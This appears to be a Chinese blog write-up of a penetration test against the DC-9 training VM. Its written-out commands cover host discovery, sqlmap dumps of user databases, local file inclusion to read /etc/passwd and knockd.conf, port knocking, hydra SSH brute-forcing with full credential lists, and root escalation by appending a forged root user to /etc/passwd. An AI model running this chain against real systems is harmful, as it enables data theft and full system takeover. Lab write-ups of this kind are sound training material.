DC9靶机渗透测试
文章目錄
- 一、信息收集
- 1.主機發(fā)現(xiàn)
- 2.端口掃描
- 二、漏洞挖掘
- 1.訪問靶機 web 服務(wù)
- 2.使用 SQLmap 進(jìn)行信息收集
- 三、提權(quán)
- 1.使用 sudo 查看可以 root 權(quán)限執(zhí)行的文件
- 2.逐層進(jìn)入并查看該目錄
環(huán)境版本:
- VMware pro 16
- Kali 2021.1(虛擬機)
- DC-9(虛擬機)
一、信息收集
1.主機發(fā)現(xiàn)
arp-scan -l
2.端口掃描
nmap -A -p- 192.168.1.111
開放了 22 ssh,但是狀態(tài)為 filtered、80 端口 apache 服務(wù)
二、漏洞挖掘
1.訪問靶機 web 服務(wù)
在 search 下表單輸入內(nèi)容提交發(fā)現(xiàn)跳轉(zhuǎn)到 results.php 頁面
在此抓包查看數(shù)據(jù)包內(nèi)容
發(fā)現(xiàn)在 /results.php 進(jìn)行了 POST 傳參,參數(shù)為 search=1
嘗試使用 sqlmap 進(jìn)行爆數(shù)據(jù)
2.使用 SQLmap 進(jìn)行信息收集
1)爆庫
sqlmap -u http://192.168.1.111/results.php --data 'search=1' --dbs
發(fā)現(xiàn)有兩個用戶庫
2)爆 Staff 數(shù)據(jù)庫表
sqlmap -u http://192.168.1.111/results.php --data 'search=1' -D Staff --tables
3)直接爆 User 表內(nèi)容
sqlmap -u http://192.168.1.111/results.php --data 'search=1' -D Staff -T Users --dump
得到 admin 賬號密碼 transorbital1
4)爆 users 庫
sqlmap -u http://192.168.1.111/results.php --data 'search=1' -D users --tables
5)爆 UserDetails 表內(nèi)容
sqlmap -u http://192.168.1.111/results.php --data 'search=1' -D users -T UserDetails --dump
得到若干賬戶密碼,將所有用戶名存到 name.txt 中,密碼存到 passwd.txt 中
3.使用 admin 登入后臺
登入后發(fā)現(xiàn)有 File does not exist 字樣,疑似有文件包含
4.嘗試文件包含
http://192.168.1.111/welcome.php?file=../../../../../etc/passwd
發(fā)現(xiàn)有本地文件包含(LFI)
5.利用 LFI 查看 /etc/knockd.conf 文件內(nèi)容
結(jié)合 22 端口 ssh 服務(wù)狀態(tài)未知
嘗試查看對方是否開啟了 knockd (端口敲門)服務(wù)
knochd 服務(wù):
在使用此服務(wù)時,他人訪問你的端口會顯示 close 狀態(tài),只有按照特定順序(配置文件)訪問規(guī)定端口后才會開放被訪問的端口,依次訪問特定端口后才會關(guān)閉被訪問的端口
http://192.168.1.111/welcome.php?file=../../../../../etc/knockd.conf
6.開啟 22 端口
依次訪問 7469,8475,9842 端口來開啟 22 端口
for x in 7469 8475 9842;do nmap -p $x 192.168.1.111;done
查看靶機端口狀態(tài)
nmap 192.168.1.111
7.使用 hydra 進(jìn)行 ssh 爆破
name.txt:
marym
julied
fredf
barneyr
tomc
jerrym
wilmaf
bettyr
chandlerb
joeyt
rachelg
rossg
monicag
phoebeb
scoots
janitor
janitor2
admin
passwd.txt:
3kfs86sfd
468sfdfsd2
4sfd87sfd1
RocksOff
TC&TheBoyz
B8m#48sd
Pebbles
BamBam01
UrAG0D!
Passw0rd
yN72#dsd
ILoveRachel
3248dsds7s
smellycats
YR3BVxxxw87
Ilovepeepee
Hawaii-Five-0
transorbital1
hydra -L ./name.txt -P ./passwd.txt 192.168.1.111 ssh -t 30
8.使用賬號登陸 ssh 進(jìn)行信息收集
登陸 janitor 賬號, 查找隱藏文件
ls -al
發(fā)現(xiàn)備份密碼,將其寫入 passwd.txt 中
再次使用 hydra
hydra -L ./name.txt -P ./passwd.txt 192.168.1.111 ssh -t 30
得到新用戶 fredf B4-Tru3-001
三、提權(quán)
1.使用 sudo 查看可以 root 權(quán)限執(zhí)行的文件
sudo -l
發(fā)現(xiàn) /opt/devstuff/dist/test/test 可以無需密碼以 root 權(quán)限執(zhí)行
2.逐層進(jìn)入并查看該目錄
發(fā)現(xiàn) test.py 判斷其是一個 python 文件,使用 cat 打印其中內(nèi)容:
fredf@dc-9:/opt/devstuff$ cat test.py
#!/usr/bin/pythonimport sysif len (sys.argv) != 3 :print ("Usage: python test.py read append")sys.exit (1)else :f = open(sys.argv[1], "r")output = (f.read())f = open(sys.argv[2], "a")f.write(output)f.close()
fredf@dc-9:/opt/devstuff$
可以看到該腳本是判斷參數(shù)是否為 3 個,如果是 3 個,將第二個文件中內(nèi)容讀出,寫到第三個文件末尾
3.構(gòu)造 root 權(quán)限用戶
因為我們可以以 root 權(quán)限執(zhí)行該腳本,所以我們嘗試構(gòu)造數(shù)據(jù)進(jìn)行對 /etc/passwd 進(jìn)行添加
openssl passwd -1 -salt toor 123456 #構(gòu)造toor用戶密碼為123456的hash
toor:111toor$9mBAQXqhpCXpTk7V6d/kI0:0:0:root:/root:/bin/bash
echo 'toor:$1$toor$9mBAQXqhpCXpTk7V6d/kI0:0:0:root:/root:/bin/bash'>/tmp/a
#將其寫入/tmp/a文件中
cd /opt/devstuff/dist/test #進(jìn)入腳本路徑
sudo ./test /tmp/a /etc/passwd #使用腳本
su toor #切換用戶
123456
總結(jié)
- 上一篇: DC8靶机渗透测试
- 下一篇: Kali2021.2 VMware最新版